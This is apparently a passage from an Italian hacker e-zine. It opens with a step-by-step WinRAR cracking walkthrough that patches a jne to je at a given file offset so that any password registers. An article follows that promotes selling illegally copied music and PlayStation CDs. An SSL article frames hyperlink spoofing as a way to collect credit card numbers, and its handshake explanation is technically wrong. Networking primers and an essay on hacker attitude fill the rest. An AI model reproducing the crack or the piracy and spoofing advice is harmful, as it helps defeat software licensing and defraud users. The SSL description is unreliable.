Wdasm, premete il primo bottone sulla toolbar (che sarebbe apri file da
disassemblare), andate nella directory del WinRAR e disassemblate il file
WINRAR95.W32. Finita la disassemblazione attivate il WINRAR95.EXE e cercate
di registrarvi inserendo Username e Password a vostro piacimento (io, tanto
per farvelo sapere, metto sempre come Username Satana e come Password 666).
A meno che non abbiate un kulo di dimensioni bibliche vi apparira' una
finestrella con scritto "Registration Failed". Memorizzate o scrivetevi il
messaggio della finestra di testo e tornate al Wdasm. Cliccate sul penultimo
bottone, quello con scritto "Strn Ref". La pressione di questo bottone fara'
apparire la lista delle stringhe di testo inserite nel programma. Fra queste
cercate il vostro "Registration Failed" e fateci doppio clic. Noterete che
il cursore si spostera' ad una certa riga, chiudete la finestrella delle
String References e salite di un paio di righe con freccia su. Vi faccio lo
schemino di come dovrebbe essere il vostro schermo a questo punto:

* Possible Reference to String Resource ID=00106: "Registration Failed"
|
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9

e poi altre tre righe. Adesso abbiamo trovato il posto dove andate a finire
quando immettete una pass sbagliata. E qui entra in gioco uno dei principi
fondamentali dell'assembler: i programmi vengono letti dall'alto in basso.
Questo significa che il jump che dobbiamo cambiare sara' SEMPRE prima della
stringa "Registrazione fallita". Quindi saliamo col cursore per un po' di
righe. Ad un certo punto ci troveremo davanti ad una schermata interessante:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00413A51(C)
|
:00413A6D 8D9554FFFFFF lea edx, dword ptr [ebp+FFFFFF54]
altre righe di codice...
:00413A82 74DF jne 00413AB3

Questo "Referenced by..." imparerete ad amarlo. Significa che tutta la serie
di procedure che dicono che il vostro serial fa schifo partono proprio dal
"Jump if not equal" 00413A82...eheheheheh...Abbiamo quasi finito. In pratica
questo jne vuol dire questo: se il codice e' diverso da quello giusto, vai e
dimmi che non va. Allora, qui sta il crack: cambiamo il jne in je. In pratica:
se il codice e' diverso da quello giusto, registrami...adesso selezionate con
il cursore la riga con jne. La riga evidenziatrice passera' da blu a verde.
Adesso guardate in fondo alla finestra di Wdasm, dovrebbe apparire una riga
piu' o meno cosi':

Line:35097 Pg 702 and 703 of 1501 Code Data @: 00413A82 @Offset 00013082h in
File:Winrar95.w32

Segnatevi l'offset togliendo tutti gli zeri e la h finale (13082) e aprite
Hiew. Andate nella dir del WinRar e aprite il file WINRAR95.EXE. Appariranno
una serie di strani caratteri e altre porcherie, ma voi che siete cracker
premete F4, selezionate DECODE e premete Invio. Magia! Appare il codice
assembler di WINRAR! Premete F5, inserite il vostro offset, ossia 13082, e
premete Invio. Vi apparira' una schermata del genere:

.00413A82: 752F jne .000413AB3 -------- (1)
.00413A84: 6A30 push 030

Il 75 sara' selezionato, e voi premendo F3 lo potrete cambiare. Cambiatelo in
74, premete F9 e poi F10. Allora, spighiamo cio' che abbiamo fatto: cambiandolo
in 74 abbiamo inserito un "je", quindi abbiamo crackato il programma in modo
che accetti ogni pass. Com F9 abbiamo salvato e con F10 siamo usciti da Hiew.
Adesso arriva la prova finale...eseguite WINRAR95.EXE e immettete un qualunque
Username e Password, a vostra scelta. Se appare la scritta "Thanks for supporting",
siete a cavallo! Il programma e' crackato, FESTA, EVVIVA! Chiudete e riavviate
il WINRAR: bum, in alto e' riapparsa la scritta (evaluation copy)...DOH...ma
cosa puo' essere successo? Semplice, se il codice non e' quello giusto, il
programma si registra comunque, ma rimane la scritta (evaluation copy) in
alto, e cio' non e' professionale! Allora, compito per casa: togliete la
scritta! Per aiutarvi vi dico che servono ancora le String Reference e il
cambio di un jump...se non ci riuscite al primo colpo, andate a tentavi:
cambiate prima un jump, poi un altro e cosi' via. Se proprio non doveste
riuscirvi, nel prossimo numero di Newbies ci sara' la soluzione...

SpYmAsTeR (or SpYm4sT3R)
spymaster99@iname.com

(P.S. per nobody: ho una correzione, nello scorso numero avete che scritto
che per velocizzare i dcc bisogna scrivere /pdcc 99999999999, ma la miglior
combo e' questa: prima si mette

/fsend on

e poi

/pdcc 2147483647

il numero 2147483647 e' il migliore in assoluto, e' il valore massimo possibile,
mentre 999999999 lo ridurrebbe...e stai trankuillo che funzia di brutto...2.5
Kb/sec su dcc...con 3 explorer e 2 dload aperti)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ MASTERIZZARE CHE PASSIONE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


Rieccoci qua'.Bene, sappiamo tutti che masterizzare cd e' illegale ma frutta
un bel po' di soldi. Per quanto mi riguarda continuero' a fare questo lavoro
fino a che " non me vengono a piglia' ", dato che in tre mesi sono riuscito a
riprendere i soldi del mio masterizzatore. Se volete acquistare un
masterizzatore SCSI (che e' il migliore) dovete mettere da parte circa un
milione. Se la cifra vi sembra un po' alta, non disperate perche' ci sono
anche i masterizzatori EIDE che sono un po' piu' lenti degli altri ma vanno
bene ugualmente. Il miglior masterizzatore EIDE e' sicuramente il MITSUMI
cr280 che si aggira intorno al mezzo milione. Bene, una volta scelto il
masterizzatore ci vuole un programma adatto per ogni duplicazione : per i
tuoi progetti personalizzati, per cd muscali, per i cd con programmi o giochi,
per giochi playstation.
Io vi consiglio tre programmi :
- To go 4.5
- Easy CD Creator
- Nero.
Quest' ultimo e' di sicuro il migliore per la duplicazione dei cd playstation.
Questi programmi li potete scaricare da

http://www.poli.studenti.to.it/software/mast95.htm

Adesso diamo un'occhiata ai cd. Per quelli musicali vi consiglio i Silver
che sono molto economici e hanno una buona registrazione, se avete un cliente
pignolo allora dovrete usare i TDK CD-R74 che sono senza dubbio i migliori
anche se costano sulle 3'500 lire cadauno. Io uso i Silver che costano la meta',
cosi' ci guadagno il doppio, ehhh.
Per i Playstation invece ci vogliono esclusivamente 3 marche :
- i TRAXDATA;
- i SONY;
- i TDK REFLEX.

Per gli altri tipi di masterizzazione un CD vale l'altro, quindi prendete
quelli piu' economici. Vi ricordo che e' consigliabile registrare i CD
musicali a 1X mentre per tutti gli altri a 2X va benissimo.
Ecco tutto, ci vediamo alla prossima !!!

KaOsS

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°°°°ÛÛÛÛ°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛ°°°°ÛÛ°°°°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°°ÛÛ°°°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

Comicio subito col dire che alcuni newbies ultimamente mi hanno fatto qualke
domanda su cose specifiche e quando gli passavo qualke doc teorico mi dicevano
...che palle! Be se pensate la stessa cosa allora lasciate perdere l'hacking e
datevi all'uncinetto xche se volete bucare uno unix e sapete solo come cancellare
i log, se volete avere l'ultima versione di winnuke ma non sapete come funzionano
i nuke..be imo siete lamer xche' se non avete le basi non potete fare niente.
Soprattutto ricordate che dietro a un hacker c'e' la voglia di conoscenza, il
volere capire come funzionano i programmi, non la voglia di distruggere tutto
di formattare a destra e a manca e se queste sono le cose che fate di solito...
be, mi dispiace ma siete e resterete lamer finche' non vorrete andare al di la'
della pappa pronta, finche' non vi verra' la nausea dopo una decina di manuali
sulle reti, finche' non avrete capito che differenza c'e' tra i vari protocolli.
Finche' non saprete cosa e' un firewall non saprete come sfruttare i suoi bug!
Non importa che eta' avete, quanto tempo dedicate ai pc, quanti amici hacker avete,
l'unica cosa importante la potete trovare solo dentro di voi, (e forse al 127.0.0.1
vero master? ehehehe) e quella cosa e' la curiosita'.
Mah, probabilmente, mi starete pigliando x pazzo, e forse non avete tutti i torti,
ma questo e' quello che penso io, e prima di diventare hacker come The Duke
passeranno anni (se mai arrivero'a i suoi livelli), xche' come diceva qualcuno
che non mi ricordo + chi era...

"+ impari e + ti accorgi che da imparare ce n'e' sempre di +".

Se dopo questa breve intro credete di avere perso del tempo, be, scusatemi.

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FIREWALL E PROTOCOLLI INTERNET ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

FIREWALL E PROTOCOLLI INTERNET (1¦ parte)

Che cosa e' un firewall?

Un firewall puo' essere paragonato ad una centralinista che sia incaricata di
filtrare le telefonate secondo determinati criteri, inoltrando od esternando
quelle "legittime" e respingendo le altre.
Allo stesso modo un firewall (software o hardware) si incarica di filtrare i
pacchetti che entrano od escono da un PC, impedendo cosi' situazioni
potenzialmente pericolose per il sistema.
Esistono varie possibilita' per attaccare un sistema, possiamo riassumerle in
due categorie.

Network Attack

Sono generalmente portati attraverso una modifica del proprio IP (spoofing)
per evitare conseguenze anche penali e si suddividono in HACK e DoS attack,
rientrano in questa categoria Nuke, Boink, Bonk, Teardrop (tutti i tipi),
Click, Flood (tutti i tipi), Puke, Nestea ecc.
Questo genere di attacchi non crea danni permanenti in un sistema ma sono
ugualmente fastidiosi visto che tendono a bloccare (crash) il PC rendendo
necessario un riavvio (reboot) oppure a rallentarne l'operativita' di rete.

VPN (Virtual Private Network) Attack

Gli attacchi di questa categoria vengono usati per intromettersi in un sistema
aggirando password ed username (BRUTE FORCE) oppure approfittando di vulnerabilita'
del sistema (CONDIVISIONI, PROXY, WINGATE) oppure avvalendosi di remote server
(BACKDOOR) preventivamente installati, per inserire programmi distruttivi (VIRUS),
per intercettare informazioni in uscita dal PC (EAVESDROPPER), per monitorare gli
orari abituali di connessione (TIMING) ed eventualmente estrapolare dal flusso
di dati di una determinata ora, informazioni interessanti (TRAFFIC ANALYSIS).

Quindi l'utilita' di avere un firewall e' indubbia ma per alcuni risulta molto
difficile effettuare dei settaggi (RULESET) adeguati alle proprie esigenze, di
conseguenza rinunciano al firewall oppure si affidano a rulesets preconfezionati
che pero' possono essere troppo permissivi (creando problemi di sicurezza) od
al contrario troppo restrittivi (impedendo l'accesso a pacchetti di dati
importanti). Cerchero' dunque di spiegare le varie parti di un ruleset e di
come devono essere impostate per ottenere determinati risultati dando uno
sguardo anche a come un pacchetto di dati viene instradato e ricevuto ed a
quali sono ed a che servono i vari protocolli di comunicazione presenti nella
rete dando anche una sommaria descrizione degli stessi.

I protocolli di comunicazione in Internet

Uno degli scopi di ARPANET (l'antenata di Internet) era lo sviluppo di uno
strumento che permettesse a computers aventi diverso hardware e diversi
sistemi operativi di comunicare. Questo fu realizzato attraverso la creazione
di un insieme di protocolli, cioe' di un insieme di regole e di convenzioni
che tutti i computer su Internet dovevano seguire per poter comunicare.
I protocolli di comunicazione usano un sistema a stack, per cui un pacchetto
quando viene instradato, deve scendere i vari livelli dello stack del sistema
mittente, attraversare la rete e risalire i vari livelli dello stack del
sistema destinatario. Ogni livello di stack del sistema mittente, aggiunge
un' intestazione (HEADER) e a volte una coda (TRAILER), alla serie dei dati
che il pacchetto contiene. Nel sistema destinatario, le intestazioni ed le
code, vengono tolte, in modo da rendere disponibili solo i dati originari del
pacchetto. Ogni livello dello stack usa un protocollo unico che permette al
relativo livello del sistema destinatari o di capire come elaborare ogni
pacchetto. I pacchetti sono distribuiti attraverso la rete con una serie di
hops (collegamenti) che formano una catena tra il sistema mittente e quello
destinatario. I routers della rete hanno tabelle di percorso che consentono
di conoscere quale deve essere il prossimo hop da raggiungere per arrivare
all'indirizzo del sistema destinatario. Un router e' un dispositivo di
comunicazione che interconnette due o piu' reti e che direziona i pacchetti
ai sistemi di destinazione.

Indirizzo IP (INTERNET PROTOCOL)

I numeri IP sono formati da un unico numero di 32bit,formato da quattro campi
di 8bit l'uno separati da un punto (###.###.###.###), ognuno di questi campi
puo' contenere quindi un

  
numero compreso tra 0 e 255, tuttavia essendo i numeri
0 e 255 riservati, si puo' avere un numero compreso tra 1 e 254.
Il primo campo contraddistingue la parte pubblica dell'indirizzo e viene
assegnato all'ISP (Internet Service Provider) dietro registrazione all'InterNIC
(Internet Network Information Center) e contrassegna anche la classe del
network (A= 1-126, B=128-191, C=192-254, 127 e' riservato) mentre i restanti
tre campi sono ad uso interno dell'ISP. Quindi risulta subito evidente che
possiamo avere una prima protezione consentendo solo a pacchetti di dati che
provengono da determinati IP, l'accesso al nostro sistema. Il problema nasce
quando non possiamo sapere preventivamente da quali IP potremmo ricevere
pacchetti importanti, come di solito succede con la navigazione (anche se
usando un proxy basta inserire il suo IP e settare la porta di connessione,
solitamente 8080, per risolvere il problema), le chats, amici con IP dinamico ecc.
Per ovviare a questo genere di problemi si puo' agire impostando la NETWORK MASK.

Network Mask

I netmasks, permettono di ordinare i pacchetti di dati destinati ai subnetworks.
La mask avra' lo stesso formato 32-bit dell'IP NUMBER (cioe' ###.###.###.###),
ed informa il sistema quali bits dell'IP ADDRESS sono il network number e l'host
number. Soltanto i bits nella parte riservata dell'IP ADDRESS possono essere
usati per indicare gli hosts. Se un bit e' acceso (1), il bit corrispondente
dell'IP ADDRESS viene considerato parte dell' indirizzo di subnetwork o della
rete. Se un bit e' spento (0), il bit corrispondente dell'ip address viene
considerato parte dell'host address. Il primo campo e' sempre 255 (11111111)
ed il quarto campo e' solitamente 0 (00000000). Per esempio, 255,255,255,0
puo' essere una rete di classe C, con i campi 1, 2 e 3 che definiscono il
network number ed il campo 4 che definisce l'host number. La maggior parte
dei campi hanno solitamente un valore di 255 o di 0, anche se altri valori
che hanno tutti1 a sinistra e tutti 0 a destra sono accettabili. Le alternative
possibili a 255 in un dato campo devono avere tutti 1 nei bits high-end e tutti
0 nei bits low-end:
254, 11111110;
252, 11111100;
248, 11111000;
240, 11110000;
224, 11100000;
192, 11000000;
128, 10000000.
I netmasks permettono di filtrare dei pacchetti che appartengono in maniera specifica
ad un dato subnetwork. Per esempio, 212.12.63.1 con il netmask settato a 255,255,255,0
permette che tutti i dati provenienti dal network 212,12,63 accedano al sistema.

IL protocollo TCP/IP

Il TCP e' un protocollo di livello trasporto. Benche' sia stato introdotto come
parte del TCP/IP, e' di uso generale; infatti e' stato preso come base per il
protocollo TP-4, proposto come protocollo OSI dall'ISO. I pacchetti che attraversano
la rete, devono passare attraverso i layers tcp e ip. Il layer dell'ip e'
predisposto a fissare la destinazione dei pacchetti ma non e' in grado di
verificare che gli stessi arrivino effettivamente a destinazione, a questo
ci pensa il layer tcp effettuando timeouts, retransmissions, acknowledgments
e confirmation relativi al pacchetto, interagendo con il layer ip. Questi
formano insieme la suite del protocollo TCP/IP (combinazione) che permette
ai pacchetti di passare attraverso la rete in modo affidabile. Poiche' il
TCP non ha particolari assunzioni per quanto riguarda la rete sottostante,
funziona su molte reti diverse: collegamenti telefonici commutati, reti locali,
reti ad alta velocita' in fibra ottica, collegamenti punto-punto a bassa
velocita' su lunghe distanze, ecc. Il TCP si occupa anche di definire le
procedure per assicurare la correttezza dei dati, di specificare il modo in
cui due computer iniziano la trasmissione della sequenza di bit e come questi
si accordano sulla fine della trasmissione, di implementare un meccanismo per
distinguere destinazioni multiple all'interno di una stessa macchina, di
implementare meccanismi per gestire la perdita e la duplicazione dei pacchetti.
Andiamo a vedere adesso quali sono le proprieta' di questo protocollo:
1. Stream Orientation
Quando due processi in due macchine si trasmettono i dati, e' possibile pensare
ad una sequenza (stream) di bit, uno di seguito all'altro, divisi in gruppi
di 8 bit. Il TCP consegna alla destinazione la stessa sequenza di bit trasmessa
dal mittente.
2. Circuito virtuale
Trasferire i dati in sequenza e' come fare una telefonata. Concettualmente,
una macchina effettua una chiamata all'altra macchina, la quale la deve
accettare. Il software che implementa il TCP verifica che la comunicazione
sia permessa e che entrambe le parti siano pronte, poi informa l'applicazione
sovrastante dell'avvenuta connessione. Durante la comunicazione le macchine
continuano a scambiarsi informazioni per controllare il corretto svolgimento
della trasmissione. Se, per qualche motivo, la comunicazione si interrompe,
entrambe le macchine segnalano la situazione alle relative applicazioni.
Questo modo di operare si indica col termine circuito virtuale, perche' le
macchine hanno l'illusione di avere una connessione harware diretta tra esse.
3. Buffered Transfer
L'applicazione invia i dati da inviare al software sottostante. Ciascuna
applicazione suddivide la sequenza dei bit in modo arbitrario, anche byte
per byte. In genere, per rendere piu' efficiente la trasmissione e per
minimizzare il traffico sulla rete, il TCP memorizza i dati da inviare
fino a quando non ha da trsmettere un datagramma di dimensioni ragionevoli.
Analogamente, se l'applicazione richiede l'invio di un blocco troppo grande,
il TCP si incarica di suddividerlo. In quelle applicazioni in cui un dato
deve essere trasferito subito, anche se non riempie il buffer (es. telnet),
esiste un meccanismo di push che forza la trasmissione. Anche in ricezione
il push forza il TCP a passare il dato immediatamente all'applicazione
sovrastante.
4. Sequenza non strutturata
La sequenza di bit trasferita dal TCP non e' strutturata, nel senso che in
tale sequenza non e' possibile a questo livello distinguere le strutture
dati presenti (p.es. non e' possibile individuare i record o i campi
all'interno dei record). Questa interpretazione dei dati deve essere fatta
a livello superiore.
5. Connessione Full Duplex
La connessione fornita dal TCP permette la trasmissione contemporanea nei
due sensi, detta, appunto, full duplex. In sostanza, e' possibile che tra
due applicazioni vengano scambiati dati nei due sensi contemporaneamente,
senza apparente interazione tra un flusso e un altro. Il TCP utilizza il
metodo piggy backing per inserire le informazioni di controllo della
trasmissione in una direzione nei dati diretti nell'altro senso. Il
protocollo TCP fornisce l'affidabilita' mediante l'utilizzo di un'appropriata
tecnica ARQ (Automatic Repeat reQuest). Il probelma della duplicazione dei
pacchetti viene risolto numerando i pacchetti in trasmissione e inviando
tali numeri in acknowledgement.

Sopra il TCP/IP, vi sono i protocolli applicativi come HTTP (HyperText Transport
Protocol) per il World Wide Web, NNTP (Network News Transport Protocol) per
UseNet e SMTP (Simple Mail Transport Protocol) per la posta elettronica.

The Duke - Fine della 1¦ parte

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SSL ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

SSL

Sappiamo che nel Web si utilizza il protocollo HTTP per comunicare tra server
e browser. Ma uno dei difetti maggiori del protocollo HTTP e' la assoluta
mancanza di sicurezza nella trasmissione. Ecco allora che si pone il problema
di come rendere sicuro questo protocollo, in particolare quando, tramite HTTP,
dobbiamo inviare dati che in nessun modo devono cadere in mano altrui, come
ad es. dati personali o numeri di carte di credito (eheheh...e qua drizzate
le orecchie :-)) ).
Ecco che la maggior parte dei server Web hanno preferito adottare un protocollo
sicuro, chiamato SSL, ovvero Secure Socket Layer, sviluppato da Netscape col
preciso scopo di fornire delle trasmissioni sicure.

Esaminiamo le caratteristiche di questo protocollo:
1) E' un protocollo aperto e non-proprietario
2) Fornisce funzioni di crittografia dei dati, autenticazione del server e
addirittura autenticazione del client.
3) E' compatibile con i firewall
4) E' compatibile con le connessioni a tunnel (le connessioni telefoniche
che consentono tramite Internet di accedere alle WAN e alle Intranet)
5) Trasmette i dati utilizzando le estenzioni S-MIME (Secure-Multipurpose
Internet Mail Extensions)

Il fatto che SSL sia un protocollo aperto e non-proprietario si traduce nel
fatto che Netscape ha reso l'intero protocollo disponibile sia per le aziende
che per i privati che dovessero impiegarlo nello sviluppo di applicazioni Internet.
Il protocollo SSL consente ai server ed agli utenti di crittografare e
proteggere le trasmissioni durante le transazioni Web e altre transazioni
Internet. Esso richiede che alla connessione partecipino un browser ed un
server SSL.
Ma vediamo piu' nello specifico come SSL puo' rendere sicure le trasazioni.

Esso da' sostanzialmente tre servizi:
1) Autenticazione del server tramite certificati digitali
2) Sicurezza delle trasmissioni tramite crittografia
3) Integrita' dei dati nelle connessioni

Nello stack dei protocolli TCP/IP, il livello SSL si trova sotto il livello
delle applicazioni (HTTP, SMTP, TElnet, FTP, Gopher e NMTP) e sopra il livello
di trasporto (che contiene il modulo TCP) e il livello di rete (che contiene
il modulo del protocollo IP).
Il posizionamento di SSL sotto i protocolli del livello delle applicazioni e
sopra il protocollo di comunicazione TCP/IP gli consente di sfruttare gli
standard esistenti per le comunicazioni via Internet, senza limitare SSL a un
determinato protocollo di applicazioni.
Quando un browser SSL si connette ad un server SSL, le due parti possono
scambiare comunicazioni criptate. In questo modo si aumenta per entrambi la
sicurezza che le comunicazioni arrivino a destinazione senza essere lette o
modificate.

L'autenticazione di server SSL utilizza la crittografia a chiave pubblica
RSA, insieme a certificati come il Verisign, in modo che quando ci si
connette ad un server, e' possibile visualizzarne il certificato per controllare
se in effetti ci si e' connessi al server desiderato.
Quando un browser ed un server stabiliscono una comunicazione sicura, il
server invia al browser una chiave di sessione che entrambi useranno per
crittografare le connessioni.
Per proteggere questa chiave di sessione, SSL utilizza un sistema a crittografia
pubblica.
In pratica quando un browser tenta di connettersi con un server sicuro, invia
al server un messaggio Client.Hello che ha lo stesso significato di una
connessione HTTP. Inoltre il browser invia al server la propria chiave
pubblica che viene generata durante l'installazione del browser sul computer.
Dopo che il server riceve il messaggio Client.Hello, valuta le informazioni
contenute nel messaggio. Se il browser supporta un tipo di crittografia
supportata anche dal server, e se gli altri protocolli SSL corrispondono a
qualli del browser, il server rispondera' con Server.Hello. La risposta del
server sara' crittografata con la chiave pubblica del client, e la risposta
del server conterra' anche la chiave pubblica del server.
Dopo che il client riceve la risposta Server.Hello, invia al server un'altra
richiesta. Il client codifica questa seconda richiesta con la chiave pubblica
del server, dal momento che e' l'unica che conosce. Oltre alle informazioni
relative all'handshake, la seconda richiesta del client chiede al server di
inviare al client la chiave di sessione che le parti da ora in poi useranno
per le comunicazioni. Quindi il server invia la chiave di sessione codificata
utilizzando la chiave pubblica del client.
Dopo che il client riceve la chiave di sessione crittografata, procedera' con
le richieste successive.
La crittografia RSA e' molto sicura, basti pensare che per "rompere" un
messaggio crittografato a 128 bit un computer da 225 MIPS ci impegherebbe
un anno.

Si puo' sapere se un documento proviene da un server sicuro osservando l'URL.
Se l'URL inizia con https il documento proviene da un server sicuro. Per
connettersi a un server HTTP che fprnisce funzionalita' di sicurezza utilizzando
il protocollo SSL bastera' aggiungere la "s".

Da quanto detto finora sembrerebbe proprio che SSL sia una bestia nera per
ogni hacker, ma in realta' non e' cosi' :-)))
Infatti, tramite un attacco noto come Hyperlink spoofing, l'hacker puo'
intromettersi nella comunicazione tra il server ed il client e convincere
l'utente a rivelare informazioni come ad es. il numero della propria carta
di credito o altre informazioni riservate.
Un alto rischio di Hyperlink Spoofing sta negli applet java, che magari si
eseguono tranquillamente perche' si ritiene provengano da server sicuri, ma in
realta' non e' cosi'.
Si noti che tutti gli attacchi di Hyperlink Spoofing si basano su un difetto
nel modo in cui i browser impiegano i certificati digitali per rendere sicure
le sessioni.
Infatti questo attacco non colpisce la crittografia a basso livello o il
funzionamento del protocollo SSL.
Come si e' gia' detto, quando un utente crea una connessione SSL, il browser
ed il server impiegano un protocollo che consente di autenticare il server e,
opzionalmente, il client.
L'attacco Hyperlink Spoofing si concentra sull'autenticazione del server.
Durante lo scambio iniziale del protocollo SSL, il server mostra al browser
il proprio certificato. Il certificato del server e' una struttura con firma
digitale che unisce la chiave pubblica e determinati attributi del server.
Attualmente il protocollo SSL impiega nel certificato un nome di DNS.
Trasportando correttamente il protocollo e presentando un certificato valido
di cui il client si puo' fidare, il server dimostra al browser di essere in
possesso della chiave privata corrispondente.
Il browser dunque crede che il server ha il diritto di utilizzare il nome
DNS che sostiene di avere, e qua cominciano i guai ^_^

L'attacco Hyperlink Spoofing ha successo perche' la maggior parte degli utenti
non chiede di connettersi a URL o a nomi DNS specifici, ma segue collegamenti
ipertestuali.
Ma il protocollo SSL verifica solo la porzione dell'indirizzo URL relativa al
server, e non il link selezionato dall'utente.
Ecco che se si riesce a condurre il browser su un indirizzo errato, l'utente
potrebbe essere ancora convinto di essere su una connessione protetta, ma in
realta' non e' cosi'.
Mi si potrebbe obiettare che, ogni volta che si accede a una pagina protetta,
una finestra del Navigator o dell'Explorer ci avvisa di essere su una pagina
protetta, ma per esperienza so che la maggior parte preferisce cekkare il
"Never display this message again" pur di evitare il pop-un continuo della
finestra.
Infine, se una connessione ed un documento sono sicuri, il fatto di sapere di
aver richiesto un documento sicuro non aggiunge particolari informazioni e
verificare la connessione del server diventa inutile.
Ecco allora che, una volta reindirizzato il browser, si potra' richiedere
qualsiasi tipo di informazione all'utente il quale, confortato dalla
sicurezza della trasmissione, non esitera' a dare.
Sicuramente l'attacco di Hyperlink Spoofing non risultera' dei piu' semplici,
ma del resto il risultato a cui porta vale la pena ;-)))
Ora vi saluto e......GoOd HaCkInG

Brigante

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ INTRODUZIONE AL RARP ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

INTRODUZIONE AL RARP
In genere, al momento del collegamento con una rete TPC/IP, un sistema deve
conoscere tutta una serie di informazioni, di cui la piu' importante e' sicuramente
l' indirizzo IP, altrimenti non sara' in grado di interagire correttamente con
gli altri computer. In realta', non tutti i sistemi collegati in rete possiedono
queste informazioni fin dall' inizio.
Per esempio, esistono periferiche che non hanno una propria memoria di massa
su cui immagazzinare i dati, come i "network computer" oppure i terminali.
Queste macchine, che dipendono da altre macchine per la memorizzazione di
dati e informazioni , spesso, non hanno neanche un vero e proprio sistema
operativo, ma lo devono caricare direttamente dalla rete al momento della
